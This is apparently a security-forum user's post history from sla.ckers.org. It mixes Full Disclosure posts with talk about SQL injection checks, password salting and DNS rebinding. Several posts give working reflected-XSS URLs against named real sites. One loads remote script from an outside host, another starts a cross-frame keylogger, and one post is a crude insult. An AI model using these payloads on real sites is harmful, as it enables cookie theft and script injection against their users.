Sla.ckers.org
Ways to improve page rank, or deceptively get more users to your websites or away from your competition. Where you can discuss SEO (search engine optimization) issues as it relates to computer security. 

Results 1 - 30 of 307
4 years ago
digi7al64
Gareth Heyes Wrote:
-------------------------------------------------------
> I'm going to unveil a new technique developed by me to hack webapps and sites. Now I'm presenting a technique which can be subcategorized under the tree of IPP injection, The "IP ON U - Injection". It involves a spray attack.

Bad news Gareth :( RKelly was the first to use th
Forum: News and Links
4 years ago
digi7al64
nvm
Forum: Full Disclosure
4 years ago
digi7al64
for the win http://samples.msdn.microsoft.com/ietestcenter/frame_holder.htm?url=javascript:alert%28%27xss%27%29;
Forum: Full Disclosure
4 years ago
digi7al64
This was discovered when the forums first came online. http://sla.ckers.org/forum/read.php?10,1031 You should be alright as long as no one is running tracking images in their sigs (which I think is disallowed)
Forum: Bugs
4 years ago
digi7al64
wow - that looks identical to something I wrote for a bank...
Forum: Projects
4 years ago
digi7al64
Another news.com.au one - the error message they give you is the best... disallowed characters.... which are unescaped. fail http://blogs.news.com.au/techblog/index.php/?moo%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E;%27
Forum: Full Disclosure
4 years ago
digi7al64
http://javascript.about.com/gi/dynamic/offsite.htm?site=javascript:alert%28document.cookie%29;
Forum: Full Disclosure
7 years ago
digi7al64
homfg - I RULZ <body onload='vbscript:msgbox "moo"' you may pay me in women or gold... or women covered in gold.
Forum: Projects
5 years ago
digi7al64
New ZFO is out http://www.milw0rm.org/papers/360 Looks like they got Ronald

Edit: And image shack wasn't them either... but given the roll call of ownage in the latest zine it looks like they are deeper into internets than anyone had thought (and possibly more skilled up than ever before).
Forum: News and Links
5 years ago
digi7al64
What type of forum software are we talking about? Does it need to defeat captchas? Are there nuances? Will it be vulnerable to xss?
Forum: News and Links
5 years ago
digi7al64
It's the same people behind project mayhem (hono) that's been around forever and the latest hackthissite zine has a message from their "blackhat overlords" which outlines the exact same argument/message from the same anti-sec movement which is kinda lame since it doesn't make it all that hard to figure out who is doing it and has been doing it. So, the sites they will own with either
Forum: News and Links
5 years ago
digi7al64
kuza55 Wrote:
-------------------------------------------------------
> digi7al64 Wrote:
> -------------------------------------------------------
> > I hope you die in a fire you pathetic spamming piece of shit.
> >
> > WE NEED NOFOLLOW ATTRIBUTES ON ALL LINKS HERE.
>
> So hacking systems is perfectly alright, but spammers are
Forum: News and Links
5 years ago
digi7al64
I hope you die in a fire you pathetic spamming piece of shit. WE NEED NOFOLLOW ATTRIBUTES ON ALL LINKS HERE.
Forum: News and Links
5 years ago
digi7al64
http://search.news.com.au/search?q=%3C%2Ftitle%3E%3Cscript+src%3D%27http%3A%2F%2Fha.ckers.org%2Fs.js%27%3E%3C%2Fscript%3E&sid=5001021&us=ndmdailytelegraph&as=NEWS.HOME&ac=DTM
Forum: Full Disclosure
5 years ago
digi7al64
nice work.
Forum: Full Disclosure
5 years ago
digi7al64
http://blogs.news.com.au/horeyandson/index.php/newscore/comments_form_thread/are_you_getting_the_bandwidth_you_want/1047767/moo?%22%3Cscript%3Ealert(%27xss%27);%3C/script%3E
Forum: Full Disclosure
5 years ago
digi7al64
yes
Forum: Full Disclosure
5 years ago
digi7al64
rvdh Wrote:
-------------------------------------------------------
> The point was made only on a script that was properly secured already, not on a script that was flawed from the start. So there are two ways to go about this, if you already write secure code you could suffice with both, if you don't an extra check is needed to notice an injection or coll
Forum: Projects
5 years ago
digi7al64
@wireghoul I know it's better to prevent injection in the first place rather than try to stop it after. What I am suggesting is adding an extra check in the code to ensure only 1 record was returned from the query. It's basically a 2 liner which helps to assist in identifying if an injection occurred (which as you and I previously pointed out can be defeated).
Forum: Projects
5 years ago
digi7al64
@backbone The game is continually evolving and it's better to be proactive in detection rather than reactive to an attack. Also, it's VERY important to note that we aren't processing data around the main function. The code I provided performed an extra check on the recordset to ensure the rowcount was equal to 1. That it is.
Forum: Projects
5 years ago
digi7al64
I understood the issue perfectly. My problem is that rather than the system confirming only 1 record is returned from the query (by checking the number of rows returned) you force it to return only 1 row with the limit statement. Hence, if I was to undertake an attack that bypassed the input sanitizing routine you wouldn't have a clue if 100 records or 1 record was returned. Thus you can't det
Forum: Projects
5 years ago
digi7al64
Why hash a salt and then concat it to another string? From a brute force perspective it is easier to brute force (assuming we had access to the database)

$encoded = sha1($pass.$name.$key).2fd4e1c6 7a2d28fc ed849ee1 bb76e739 1b93eb12

than it is this

$encoded = sha1($pass.$name.$key.!23g^gdd z!g0(-gc fd8#9&ez1 5$rtb76$9 1b!-Zeb12)

The second example is much better as the actual string to
Forum: Projects
5 years ago
digi7al64
t Wrote:
-------------------------------------------------------
> was playing around with url=
>
> hxxps://blackboard.uoregon.edu/webapps/login/?new_loc=">
>
> it's neat, but I tried to escape so I could script but had no luck... is possible?

blackboard has so many xss (persistent and reflective) vulns in it it's not funny. We spent an afternoon on it o
Forum: Full Disclosure
5 years ago
digi7al64
I am only guessing the DDoS is only part of it. As he said this whole industry is based around a small number of people who really think they are the duck's guts when compared to everyone else and as such those not inside the clique are generally treated like shit, so why bother.
Forum: OMG Ponies
6 years ago
digi7al64
kuza55 Wrote:
-------------------------------------------------------
> Umm, I don't know about you, but I'd throw this in the "don't really care" bucket.
>
> Sure, you can get their keystrokes across-domain, hell there's a more useful variant where after you inject an iframe, you can then keep stealing focus to get keystrokes, however, in the examp
Forum: News and Links
6 years ago
digi7al64
After much debate with a vulnerability assessor in regards to the same domain policy (and the fact I believed it couldn't be bypassed with modern browsers barring an 0 day) I was presented with a link to the following script. <html> <head> <title>IE Cross Frame Scripting Restriction Bypass Example</title> <script> var keylog=''; document.onkeypress = function () {
Forum: News and Links
6 years ago
digi7al64
I mucked around a bit with this and couldn't find anything. Interestingly though when the following code is executed (onclick) Chrome appears to automatically close the alert box for you. <iframe src="" id="c"></iframe> <input type="button" onclick="document.getElementById('c').src='javascript:alert(1);';" value="iof"/>
Forum: Full Disclosure
6 years ago
digi7al64
@lpilorz - thanks for that. I will test it out tonight. Also, in a lot of the recently written material I have read about DNS rebinding it appears that it seems to only work in attacking internal networks (as with your PoC). Is this correct or can you use the attack against sites on the internet as well?
Forum: Projects
6 years ago
digi7al64
Chrome Vulnerabilities

This is a site of a friend of mine. Plans are afoot to record all bugs/sploits for Google Chrome so if you hear of any then you can let him know via email at chromekb...gmail
Forum: News and Links
6 years ago
digi7al64
Thanks for the info. I guess this is something that can't be patched easily other than forcing the TTL value to be force locked for the entire active session (which is going to create problems anyways).
Forum: Projects